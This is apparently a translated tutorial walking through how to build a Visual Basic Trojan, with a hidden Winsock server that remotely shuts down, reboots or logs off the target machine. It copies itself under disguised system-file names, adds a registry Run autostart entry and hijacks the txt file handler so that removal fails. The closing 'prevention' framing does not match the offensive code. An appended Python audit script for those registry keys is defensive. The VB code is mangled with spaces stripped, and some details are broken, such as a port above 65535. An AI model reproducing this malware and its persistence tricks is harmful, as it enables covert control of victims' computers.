First, create a new project named Server, create a new form whose Name is Server, add a Winsock control to the form, set its Name to sckServer, and leave the protocol at the default, TCP/IP.
Next, we go back to the Server form module and add the following code:
->PRivateSubform_Load()
WithMe
.sckServer.LocalPort=88917'Local port (haha! My birthday!)
.sckServer.Listen'Start listening
EndWith
EndSub
'Accept the client's connection request.
PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
WithMe
If.sckServer.State<>sckClosedThen.sckServer.Close
.sckServer.Accept(requestID)
EndWith
EndSub->
Next, let's create the client program: create a new project named Client, name the form Client, add a Winsock control named sckClient to it, and set the protocol to TCP/IP. Add a button named cmdConnect and add the following code to the form module:
->PrivateSubform_Load()
WithMe
.sckClient.RemoteHost=127.0.0.1'Set the remote IP. In this example, set it to the local machine.
.sckClient.RemotePort=88917'Remote port is the same as the setting in the server.
EndWith
EndSub
PrivatesubcmdConnect_Click()
SckClient.Connect
Endsub->
At this point, when we click the Connect button, the two projects can communicate, but nothing visible happens. To see it, add this line to the sckClient_Connect event in the Client: Debug.Print "Connection successful!"
This is only the first step; no real work is done yet. Let's add functionality. For the sake of simplicity, this article implements only a few small functions: shutdown, restart, and logout. OK, let's get started!
Create a new module in the Server project with the name modApi. This module contains some API functions. Add the following API functions:
->PublicDeclareFunctionExitWindowXXXLibuser32AliasExitWindowXXX(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLibuser32AliasClipCursor(lpRectAsAny)AsLong
PublicTypeRECT
LeftAsLong
TopAsLong
RightAsLong
BottomAsLong
EndType->
Note: In programming between two sockets, the important event for communication is the DataArrival event, which is used to receive remote data.
Next, put three buttons in the Client form of the Client project, namely cmdExit, cmdLogoff, and cmdReboot. They are used for remote shutdown, logout, and restart operations. Add the following codes respectively:
->PrivateSubcmdExit_Click()
Me.sckClient.SendDataExit
EndSub
PrivateSubcmdLogoff_Click()
Me.sckClient.SendDataLogoff
EndSub
PrivateSubcmdReboot_Click()
Me.sckClient.SendDataReboot
EndSub->
All requests are sent to the server. Now go to the Server project and add the DataArrival event of sckServer to receive the client's requests.
->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
DimstrDataAsString
WithMe
'Receive information requested by the customer
.sckServer.GetDatastrData
SelectCasestrData
CaseExit
'Shut down
CallExitWindowXXX(EWX_SHUTDOWN,0)
CaseReboot
'Restart
CallExitWindowXXX(EWX_REBOOT,0)
CaseLogoff
'Logout
CallExitWindowXXX(EWX_LOGOFF,0)
EndSelect
EndWith
EndSub->
Okay, the functions are implemented, but we are not finished: we want the program to run in the background. This is simple: add the statement Me.Hide to the Form_Load event in the Server. It is now invisible, but everyone knows that a Trojan runs automatically as soon as the computer is turned on. Why is this, and how is it achieved? By adding it to the startup group in the registry? Yes, good, come with me!
Go back to modApi in the Server project and add the following API function:
->PublicDeclareFunctionRegOpenKeyLibadvapi32.dllAliasRegOpenKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicDeclareFunctionRegSetvalueExLibadvapi32.dllAliasRegSetvalueExA(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong
PublicDeclareFunctionRegCreateKeyLibadvapi32.dllAliasRegCreateKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3
PublicConstREG_SZ=1
PublicConstHKEY_LOCAL_MACHINE=&H80000002
PublicConstHKEY_CLASSES_ROOT=&H80000000->
A procedure that writes to the registry startup group:
->PublicSubStartupGroup()
DimsKeyAsString
DimresultAsLong
DimhKeyIDAsLong
DimsKeyValAsString
sKey=Systrsy'Start the key in the group and find one that is similar to the system file.
sKeyVal=C:/windows/system/systrsy.exe'The path of the Trojan file. You can use GetSystemDirectory to obtain the system path.
result=RegOpenKey(HKEY_LOCAL_MACHINE,_
Software/Microsoft/Windows/CurrentVersion/Run,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
EndIf
EndSub->
Well, that's it. However, have you thought about this: if the user is not a novice and deletes the entry from the registry, wouldn't our hard work be wasted? So it has to be made impossible to remove even if he finds it. Please look at the code below:
->PublicSubWriteToTxt()
DimresultAsLong
DimhKeyIDAsLong
DimskeyAsString
DimskeyValAsString
skey=txtfile/shell/open/command
skeyVal=C:/windows/system/txtView.exe
result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
EndIf
EndSub->
Many friends will have seen at a glance that this is an association with the txt file type, which is not bad at all, but where did C:/windows/system/txtView.exe come from? Our Trojan is C:/windows/system/systrsy.exe. txtView.exe is a clone of our Trojan horse.
Okay, go back to the form_Load of the Server form of the Server project and add the following code:
->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&/&App.EXEName&.exe
sSystemDir=C:/windows/system
OnErrorResumeNext
'Copy the file to Systrsy.exe in the system directory
FileCopysCurrentPath,sSystemDir&/Systrsy.exe
OnErrorResumeNext
Copy the file to txtView.exe in the system directory
FileCopysCurrentPath,sSystemDir&/txtView.exe->
Then make the calls:
->CallstartupGroup
CallWriteToTxt
'Determine whether the program is running
IfApp.PrevInstanceThen
'Exit if already running.
End
EndIf->
Notes:
1. When choosing ports, it is best to use high-numbered ports; otherwise they will conflict with some commonly used ports.
2. It is best to read relevant books when using VB.NET for the first time.
The above is how to use Visual Basic to prevent Trojan attacks. I hope you will all know yourself and the enemy and take precautions before attacks happen!
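For the defensive side, the two registry locations discussed above (the Run startup key and the txtfile open command) can be audited from a `reg export` dump. The following is an added example, not code from the original article; the sample export, the baseline entry name `ExampleUpdater` and the allowed handler list are constructed assumptions.

```python
import re

# Constructed sample in `reg export` text form (not captured from a real host).
SAMPLE_EXPORT = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"
"Systrsy"="C:\\windows\\system\\systrsy.exe"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="C:\\windows\\system\\txtView.exe %1"
'''

RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
TXT_KEY = r"hkey_classes_root\txtfile\shell\open\command"
# Assumed baseline for this example; build the real one from a known-good image.
RUN_BASELINE = {"exampleupdater"}
TXT_HANDLERS = {"notepad.exe"}

def parse_reg(text):
    """Return {key_path_lower: {value_name: data}}; only REG_SZ values are read,
    hex-encoded types such as hex(2): are skipped."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None:
            m = re.match(r'^(@|"(?:[^"\\]|\\.)*")="(.*)"$', line)
            if m:
                name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
                # Undo .reg escaping (\\ -> \ and \" -> ").
                current[name] = re.sub(r'\\(.)', r'\1', m.group(2))
    return keys

def exe_name(command):
    """Lower-cased base file name of the program a command line starts."""
    cmd = command.strip()
    path = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(" ", 1)[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def audit(text):
    """List (finding, value_name, data) for entries outside the baseline."""
    keys, findings = parse_reg(text), []
    for name, data in keys.get(RUN_KEY, {}).items():
        if name.lower() not in RUN_BASELINE:
            findings.append(("run-autostart", name, data))
    handler = keys.get(TXT_KEY, {}).get("@")
    if handler is not None and exe_name(handler) not in TXT_HANDLERS:
        findings.append(("txtfile-handler", "@", handler))
    return findings
```

A base-name match on the handler is only a first-pass filter; a finding or a pass should be followed by checking the full path and file signature of the referenced executable.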